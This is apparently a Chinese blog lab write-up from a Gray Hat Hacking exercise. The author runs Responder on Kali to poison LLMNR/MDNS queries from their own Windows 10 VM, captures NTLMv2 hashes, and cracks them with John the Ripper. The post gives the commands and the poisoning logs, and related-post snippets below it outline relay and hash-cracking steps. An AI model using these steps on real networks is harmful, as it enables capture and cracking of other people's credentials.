灰帽黑客(第五版):实验10-1 使用Responder获取口令

已于 2023-08-26 18:45:37 修改
阅读量241 收藏
点赞数
文章标签: linux
于 2023-08-25 21:31:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lmpwang/article/details/132503014
版权

本地搭建环境:

宿主机Kali:192.168.43.209
虚拟机VirtualBox:
网络:桥接网络,使虚拟机和宿主机保持在一个网段
系统:win10家庭版系统(初始系统使用virtualbox安装过程默认密码changeme!
Responder

模拟:

win10使用初始密码

Kali启动Responder

python ./Responder.py -wd -I wlan0         
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C
  .
  .
  .
  [+] Current Session Variables:
    Responder Machine Name     [WIN-R0J1ROPSQKF]
    Responder Domain Name      [TTQT.LOCAL]
    Responder DCE-RPC Port     [45338]

[+] Listening for events...

win10执行共享协议

cmd
net use \\x

Kali收到win10交互
交互协议
然后ctrl + c退出Responder,执行./DumpHash.py 保存hash值
hash
可以看到本地保存了两个DumpNTLMv2.txt文件,开始破解(这一步基本可以很快破解)

john DumpNTLMv2.txt

破解

修改win10帐号密码

这一步将密码改为复杂的密码(Wan0729!@#)继续重复以上的步骤基本上第2步就开始有问题
win10共享协议有问题
net

Responder读不到hash

[+] Current Session Variables:
    Responder Machine Name     [WIN-NHOH627GLXN]
    Responder Domain Name      [OXH5.LOCAL]
    Responder DCE-RPC Port     [49638]

[+] Listening for events...                                                                                

[*] [DHCP] Found DHCP server IP: 192.168.43.110, now waiting for incoming requests...
[*] [MDNS] Poisoned answer sent to 192.168.43.238  for name x.local
[*] [MDNS] Poisoned answer sent to fe80::8d78:9e01:5573:135e for name x.local
[*] [MDNS] Poisoned answer sent to 192.168.43.238  for name x.local
[*] [LLMNR]  Poisoned answer sent to fe80::8d78:9e01:5573:135e for name x
[*] [MDNS] Poisoned answer sent to fe80::8d78:9e01:5573:135e for name x.local
[*] [LLMNR]  Poisoned answer sent to 192.168.43.238 for name x
[*] [LLMNR]  Poisoned answer sent to fe80::8d78:9e01:5573:135e for name x
[*] [LLMNR]  Poisoned answer sent to 192.168.43.238 for name x
[*] Skipping previously captured hash for .\vboxuser

卡在破解密码页面
在这里插入图片描述
重新修改密码为changeme1后,可以破解,说明还是基于弱口令的一个破解,比较鸡肋,哈哈

lmpwang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Responder 嗅探/欺骗工具
课嗨教育的专栏
02-07 1111
responder 这个工具首先是一个LLMNR和NBT-NS响应者,它将根据它们的名字后缀来回答特定的NBT-NS(NetBIOS名称服务)查询 。默认情况下,该工具只会回答针对SMB的文件服务器服务请求。这背后的概念是针对我们的答案,并在网络上隐身。这也有助于确保我们不会破坏合法的NBT-NS行为。如果您希望此工具回答工作站服务请求名称后缀,可以通过命令行将-r选项设置为1。 用法: responder -I eth0 -w -r -f 或 responder -I eth0 -wrf 帮助:
灰帽黑客》第五章软件定义的无线电笔记
DeViLve的博客
11-23 351
0x00 无线电:现代社会中不再使用有限电缆的无线设备越来越多,一方面让使用使用起来更加便利,另一方面也增加了无线设备遭受进途和远程攻击的风险。与访问一台超出一定物理范围的无线传感器相比,困难的是如何访问一台使用物理连接且未公开的传感器,只有能够访问无线信号才有进一步攻击的可能。本章主要研究软件定义的无线电SDR的开源软件,介绍评估和测试产品的过程,与分析简单RF(射频)设备的攻击步骤。 0x01 SDR:SDR是软件定义无线电,使用可定制的软件组件实现无线电功能,并使用软件组件处理原始数据,SDR并非单
灰帽黑客(第五版):实验10-6 使用WinRM执行命令
最新发布
lmpwang的博客
08-26 332
宿主机Kali:192.168.43.209虚拟机VirtualBox:网络:桥接网络,使虚拟机和宿主机保持在一个网段 192.168.43.129系统:win10专业版(Windows 10 Enterprise LTSC)ResponderPython2pip2。
灰帽黑客第五版实验3-3:AFL测试过程中出现“last new path : none yet (odd, check syntax!)”
Gavinsunjiawei的博客
06-22 1743
前几天赶上618京东图书打折,买了一本灰帽黑客,在第三个实验AFL测试中,原书是这样写的: 你将在这个实验中构建和使用上述AFL,步骤如下: 1)从kalilinux 2017下载和构建AFL: wget lcamtuf.coredump.cx/afl/releases/afl-latest.tgz tar -xzvf afl-latest.tgz cd afl-2.41b/ make 2)复制asdf.c文件.将其保存到afl-2.41b/目录中 asdf文.
不利用系统漏洞拿shell,kali强大工具Responder
qq_39815966的博客
10-17 1708
这是一种不用通过漏洞利用来获取权限的一种方法,使用的是kali的一个工具,叫Responder,主要是通过监听网络,有人如果访问了虚假的共享文件地址,就会获得该系统登录口令的哈希值,然后再通过脚本进行hash爆破就可以获取口令,再通过ipc建立空连接获得系统权限。 我们的第一步当然是获取该工具喽,非常的简单,只要从github上下载即可, 当然首先你先需要安装一下python环境和git工具 # apt-get intall build-essential git python-dev 然后是直接从git
使用Responder获取ntlmv2 hash
whojoe的博客
03-03 1329
使用Responder获取ntlmv2 hashResponder配置下载获取ntlmv2hash之后进行爆破获取ntlmv2使用hashcat爆破密码中继获得shell参考文章 Responder配置 下载 https://github.com/lgandx/Responder Responder工具可以污染LLMNR和NBT-NS请求。 在目录下的Responder.conf可以配置启用的模块 如果只需要获取ntlmv2hash使用默认配置即可,之后使用Hashcat进行暴力破解 如果要使用ntlm中
Responder
m0_56010012的博客
04-11 2683
在hack the box 最后一个sql注入题时,有这个工具的使用,之前没有接触过,看write up上是需要利用两个IP地址,似乎与内网渗透有关,马上查找相关资料,看到底是个什么东东。
responder简单用法
qq_44881113的博客
09-08 1380
Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix Responder 是一款可以在局域网模拟各种服务器的内网渗透神器 其可以在局域网中进行 DNS 欺骗、LLMNR 欺骗等,实现对用户 NTLM 口令的探测以及 DNS 钓鱼 同时其还可以模拟包括 FTP、HTTP 在内的多
最新kali之responder
vanony的博客
07-09 693
选项: --version 显示程序的版本号并退出 -h, --help 显示此帮助消息并退出 -A, --analyze 分析模式。 此选项使您无需响应即可查看NBT-NS,BROWSER,LLMNR请求。 -I eth0, --interface=eth0 要使用的网络接口,可以将“ ALL”用作所有接口的通配符 -i 10.0.0.21, --ip=10.0.0.21 要使用的本地IP(仅适用于OSX) -e 10.0.0.22, --externalip=10.0.0.22 使
内网渗透之Responder演练(下)
qq_53058639的博客
08-21 109
NTLM中继攻击已经被发现十多年了,要实现NTLM中继攻击,也需要先进行LLMNR/NBNS欺骗,这样,攻击机器就可以充当了中间人,本质上还是由于NTLM认证机制所导致的,且对于最新的NTLMv2认证任然有效,但这个过程并不是没有限制,对于工作组的机器来说,两台机器的密码需要一致才能成功,对于域用户来说,被欺骗用户(发起请求的用户)需要域管理员组里边的用户才可以,NTLM中继成功后的权限为被欺骗用户的权限。这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。
KALI 2020 软件集成清单——嗅探/欺骗(九)
weixin_44024324的博客
04-29 1054
9、嗅探/欺骗 9.1网络欺骗 9.1.1 dnschef 是一个高度可配置的DNS代理,用于渗透测试和恶意软件分析 9.1.2 rebind 可以实现对用户所在网络路由器进行攻击。当用户访问Rebind监听域名,Rebind会自动实施DNS Rebinding攻击,通过用户的浏览器执行js脚本,建立socket连接 9.1.3 sslsplit 作为mid man监听ssl信息及HTTP信息。h...
Kali 玩机技巧(杂篇)
辉小鱼的博客
11-03 2013
本文是有关Kali Linux系统的一些简单低级的用法演示,是我个人听课笔记的总结,希望能解决大家的一些问题与困惑!该博文仅限技术学习与交流,若由此发生的一切攻击不法行为,皆与本人无关!
Hack The Box Starting Point 渗透测试入门靶场 TIER 1 - Responder
Start C的博客
04-19 1166
涉及到SMB,枚举,Apache和WinRM(WinRM是Windows Remote Managementd(win远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80或443端口。这样我们就可以在对方有设置防火墙的情况下远程管理这台服务器) 先看一下旁边的Walkthough,看看本靶场的要求 本实验重点介绍如何利用 Windows 机器上提供的网页上的文件包含漏洞来收集运行 Web 服务器的用户的 NetNTLMv2 质询。我们将使用一个名为 Responder 的实用程
【HTB系列】靶机Querier的渗透测试
大方子
07-01 2342
总结与反思: 1. 收集信息要全面 2. 用snmp-check检查snmp目标是否开启这个服务 3. smbmap尝试用匿名用户anonymous来枚举目标的共享资源,可能会枚举成功 4. 使用smbclient连接到smb进行命令操作 5. 使用ole来分析宏 6. 使用mssqlclient.py来连接MSSQL 7. mssqlclient.py开启Windows Aut...
SMB中继——内网渗透
include_voidmain的博客
04-26 3302
0x01 SMB协议 SMB概述: SMB(ServerMessage Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。 SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。 SMB使用了NetBIOS的应用程序接口 (ApplicationProgram Interface,简称API),一般端口使用为139,4
PaintCode Tutorial: Bezier Paths
args_的博客
09-14 731
Learn how to create dynamic curved arrows! Welcome to our third and final part of our PaintCode tutorial series! PaintCode is a neat app where you can draw user interfaces like in Photoshop
Responder探测内网获取域控权限总结
weixin_34117522的博客
03-19 841
Responder探测内网获取域控权限总结(1)执行Responder探测内网(https://github.com/lgandx/Responder)./Responder.py -I eth0 -rPv(2)获取172.16.157.133的Responder值(3)使用Crack Map Exec检查此主机的NetBIOS信息cme smb 172.16.157.133(4)使用hashca...
内网渗透----Linux下信息收集
浅笑996的博客
12-04 4474
1.系统类型 cat /etc/issue查看系统名称 Lsb-release查看系统名称、版本号 2. 内核版本 uname –a 查看所有信息 ls /root |grep vmlinuz 3. 进程 ps aux 查看进程信息 ps –ef查看进程信息 4. 安装的软件包 使用dpkg –l查看安装的软件包 5. 服务配置 查看apache配置文件 6. 网络...
修改这个函数的框架,使得可以其可以响应正常请求,也可以响应错误。正常请求和错误可以返回不同的struct。pub async fn create_task(req: web::Json<PostTaskReq>, config: web::Data<JudgeConfig> ) -> impl Responder {}
07-17
要使`create_task`函数能够响应正常请求和错误,并返回不同的结构体,你可以使用Rust中的`Result`类型和`Result`宏。 首先,你需要定义两个结构体,一个用于表示正常响应的数据,另一个用于表示错误响应的数据。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值